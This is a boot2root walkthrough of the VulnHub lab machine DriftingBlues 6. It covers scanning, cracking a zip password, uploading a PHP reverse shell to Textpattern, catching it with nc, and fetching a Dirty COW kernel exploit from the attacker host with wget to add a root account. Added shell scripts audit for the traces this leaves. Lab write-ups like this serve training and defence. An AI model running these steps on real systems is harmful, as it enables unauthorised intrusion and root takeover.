DRIFTINGBLUES: 6 WALKTHROUGH
Today we are going to take on another boot2root challenge known as "DRIFTINGBLUES-6". The credit for making this VulnHub machine goes to 'tasiyanci', and as with every boot2root challenge the goal is to get root access to complete it.
URL: https://www.vulnhub.com/entry/driftingblues-6,672/
Security Level: Easy
Scanning
# netdiscover -i vboxnet0
We found our target's IP address, 192.168.56.162. Our next step is to scan the target with nmap.
Enumeration
# nmap -v -sC -sV -sT -O -A -p- 192.168.56.162
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 17:40 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating ARP Ping Scan at 17:40
Scanning 192.168.56.162 [1 port]
Completed ARP Ping Scan at 17:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:40
Completed Parallel DNS resolution of 1 host. at 17:40, 0.35s elapsed
Initiating Connect Scan at 17:40
Scanning 192.168.56.162 [65535 ports]
Discovered open port 80/tcp on 192.168.56.162
Completed Connect Scan at 17:40, 1.90s elapsed (65535 total ports)
Initiating Service scan at 17:40
Scanning 1 service on 192.168.56.162
Completed Service scan at 17:41, 6.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.56.162
NSE: Script scanning 192.168.56.162.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.15s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.01s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Nmap scan report for 192.168.56.162
Host is up (0.00095s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
MAC Address: 08:00:27:97:52:E8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2-3.16
Uptime guess: 0.015 days (since Sun Jun 6 17:20:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.95 ms 192.168.56.162
NSE: Script Post-scanning.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
From the nmap result we found an HTTP service running on port 80, so we browsed to the target's IP address. Let's explore the webpage!
First, I manually checked the /robots.txt file, which contains the entry /textpattern/textpattern. That path is the Textpattern login page. I tried the default username and password but got nowhere, so I searched for more directories with gobuster.
# gobuster dir -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.162 -x php
I went through the directories one by one and found a zip file in the /spammer directory. I downloaded it, but it is password protected; inside is a creds.txt file. I tried the default password 'admin', which was wrong, so I googled how to crack a zip file's password.
# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt /root/Downloads/spammer.zip
The password is myspace4. Let's open creds.txt.
It gives us one username, mayer, and one password, lionheart. Let's log in to the Textpattern CMS.
Before uploading the PHP file, set the LHOST and LPORT values in it.
Time to upload the PHP reverse shell.
Location: Content > Files > upload the PHP file.
We have successfully uploaded the PHP file. Next, start a listener on the attacker machine, then request php-reverse-shell.php to get a reverse shell.
PHP file run location (this is where Textpattern stores uploaded files):
http://192.168.56.162/textpattern/files/php-reverse-shell.php
# nc -nlvp 443
We got a reverse shell.
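As an added defensive check, not part of the original write-up: the upload above works because Apache executes .php files placed under textpattern/files/. The script below audits an upload directory for server-side script files, using a constructed sample directory; it assumes the upload root is passed as the first argument.

```shell
#!/bin/sh
# Added example (not from the write-up): list server-side script files inside
# a CMS upload directory. Any such file there is either an execution
# misconfiguration or an indicator of compromise, as in this walkthrough.

# Print the path, relative to $1, of every file whose extension a typical
# Apache PHP handler would execute (php, phtml, phar, php3..php7).
find_script_uploads() {
    dir="$1"
    find "$dir" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.phar' \
        -o -iname '*.php[3-7]' \) | sed "s|^$dir/||" | sort
}

# Constructed sample upload directory so the check runs offline.
make_sample_upload_dir() {
    d=$(mktemp -d)
    printf 'jpeg bytes' > "$d/photo.jpg"
    printf 'notes' > "$d/readme.txt"
    mkdir "$d/2021"
    printf '<?php // constructed placeholder file' > "$d/2021/upload.php"
    printf '<?php' > "$d/image.phtml"
    echo "$d"
}

# Run the audit over the constructed directory and print the hits.
demo() {
    d=$(make_sample_upload_dir)
    find_script_uploads "$d"
    rm -rf "$d"
}

demo
```

On a live server, run `find_script_uploads /var/www/<site>/textpattern/files` from cron and alert on any output.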
Check whether we have a TTY shell:
# tty
Spawn a TTY shell:
# python -c 'import pty; pty.spawn("/bin/bash")'
Check the kernel version:
# uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
Search Google for an exploit for this kernel version. It is vulnerable, so I downloaded the exploit.
Time to transfer the .c file to the victim machine. On the attacker machine, serve it over HTTP:
# python -m SimpleHTTPServer 80
Back on the victim machine:
# cd /tmp
# wget http://192.168.56.1/40839.c
# ls -lah
# gcc -pthread 40839.c -o dirty -lcrypt
# ./dirty
Please enter the new password: 12345
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: 7f3b4a2d5000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart’ and the password ‘12345’.
DON’T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: 7f3b4a2d5000
madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart’ and the password ‘12345’.
DON’T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
After this we have a new user, firefart. Restore the original passwd file, then switch to the new user.
# mv /tmp/passwd.bak /etc/passwd
# su firefart
Password: 12345
# id
# cd /root
# cat flag.txt
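From the defender's side, an added example that is not part of the original write-up: the kernel exploit used above (40839.c, the Dirty COW passwd-overwrite PoC) leaves a UID-0 account with an inline DES hash in /etc/passwd. The checks below find both traces in a constructed passwd file modelled on the output shown above; they assume the passwd file path is passed as the first argument.

```shell
#!/bin/sh
# Added example (not from the write-up): audit a passwd file for the traces
# the exploit above leaves behind.

# Print every account with UID 0 other than root, one per line.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print accounts whose password field carries a hash directly in passwd
# instead of the "x" placeholder that defers to /etc/shadow; the
# "Complete line" printed by the exploit is exactly such an entry.
inline_hash_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "" { print $1 }' "$1"
}

# Constructed sample passwd modelled on the walkthrough's output.
make_sample_passwd() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
EOF
    echo "$f"
}

# Run both checks over the sample and report the findings.
demo() {
    f=$(make_sample_passwd)
    echo "extra UID-0 accounts: $(extra_uid0_accounts "$f")"
    echo "inline hash accounts: $(inline_hash_accounts "$f")"
    rm -f "$f"
}

demo
```

On a real host also check for the /tmp/passwd.bak copy the exploit writes, and compare the result of `extra_uid0_accounts /etc/passwd` against a known-good baseline.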
WE HAVE DONE IT !!!!!!!!!